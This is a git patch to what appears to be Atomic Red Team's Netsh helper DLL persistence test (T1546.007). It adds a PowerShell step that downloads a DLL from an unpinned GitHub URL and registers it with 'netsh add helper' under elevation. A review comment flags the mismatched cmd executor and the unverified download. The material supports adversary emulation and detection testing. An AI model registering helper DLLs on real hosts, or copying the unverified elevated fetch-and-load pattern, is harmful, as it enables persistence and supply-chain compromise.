From de803e9e5361226c7dc21c4e3accb5f2bd5fac2a Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Fri, 23 Sep 2022 18:16:10 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 48 ++++++++++++++++++++++++++++------ atomics/T1546.007/T1546.007.md | 27 ++++++++++++++++--- 2 files changed, 64 insertions(+), 11 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index fe9bbd74..d811c339 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -40929,22 +40929,38 @@ privilege-escalation: atomic_tests: - name: Netsh Helper DLL Registration auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - description: 'Netsh interacts with other operating system components using dynamic-link - library (DLL) files + description: | + You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called. + The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run. - ' + [Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html) + [Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon) supported_platforms: - windows input_arguments: helper_file: description: Path to DLL type: Path - default: C:\Path\file.dll + default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll + dependencies: + - description: 'Helper DLL must exist on disk at specified location (#{helper_file}) + + ' + prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" executor: command: 'netsh.exe add helper #{helper_file} + ' + cleanup_command: 'netsh.exe delete helper #{helper_file} + ' name: command_prompt + elevation_required: true T1574.004: technique: x_mitre_platforms: 
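Review bot: The dependency commands are PowerShell (`Test-Path`, `New-Item`, `split-path`, `Invoke-WebRequest`) but the test only declares `executor.name: command_prompt` and no dependency executor, so the prereq check and the download appear to run under cmd.exe, where `if (Test-Path "#{helper_file}") { exit 0} else { exit 1}` is not valid and dependency resolution cannot succeed; adding `dependency_executor_name: powershell` next to `dependencies:` is the usual fix. Separately, `get_prereq_command` fetches a DLL from the moving `master` branch with no integrity check and the executor then loads it into netsh.exe under `elevation_required: true`, so anyone able to change that branch (or the file at that URL) gets elevated code execution on the test host — pin the URL to a commit and verify the download, e.g. compare `(Get-FileHash "#{helper_file}" -Algorithm SHA256).Hash` against a recorded value and remove the file on mismatch. Also quote the path in `(Split-Path "#{helper_file}")` so a `helper_file` containing spaces does not break directory creation, and fix the typo `persistance` → `persistence` in the description. This index is generated from the atomic definition (per the commit subject), so the change belongs in the source `T1546.007` YAML; the same block is repeated under `persistence:` in the next hunk.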
@@ -63735,22 +63751,38 @@ persistence: atomic_tests: - name: Netsh Helper DLL Registration auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - description: 'Netsh interacts with other operating system components using dynamic-link - library (DLL) files + description: | + You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called. + The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run. - ' + [Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html) + [Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon) supported_platforms: - windows input_arguments: helper_file: description: Path to DLL type: Path - default: C:\Path\file.dll + default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll + dependencies: + - description: 'Helper DLL must exist on disk at specified location (#{helper_file}) + + ' + prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" executor: command: 'netsh.exe add helper #{helper_file} + ' + cleanup_command: 'netsh.exe delete helper #{helper_file} + ' name: command_prompt + elevation_required: true T1505.001: technique: x_mitre_platforms: diff --git a/atomics/T1546.007/T1546.007.md b/atomics/T1546.007/T1546.007.md index 030d6a95..b7315359 100644 --- a/atomics/T1546.007/T1546.007.md +++ b/atomics/T1546.007/T1546.007.md @@ -12,7 +12,11 @@ Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code
## Atomic Test #1 - Netsh Helper DLL Registration -Netsh interacts with other operating system components using dynamic-link library (DLL) files +You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called. +The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run. + +[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html) +[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon) **Supported Platforms:** Windows @@ -26,19 +30,36 @@ Netsh interacts with other operating system components using dynamic-link librar #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| helper_file | Path to DLL | Path | C:\Path\file.dll| +| helper_file | Path to DLL | Path | PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll| -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd netsh.exe add helper #{helper_file} ``` +#### Cleanup Commands: +```cmd +netsh.exe delete helper #{helper_file} +``` +#### Dependencies: Run with `command_prompt`! +##### Description: Helper DLL must exist on disk at specified location (#{helper_file}) +##### Check Prereq Commands: +```cmd +if (Test-Path "#{helper_file}") { exit 0} else { exit 1} +``` +##### Get Prereq Commands: +```cmd +New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" +``` + +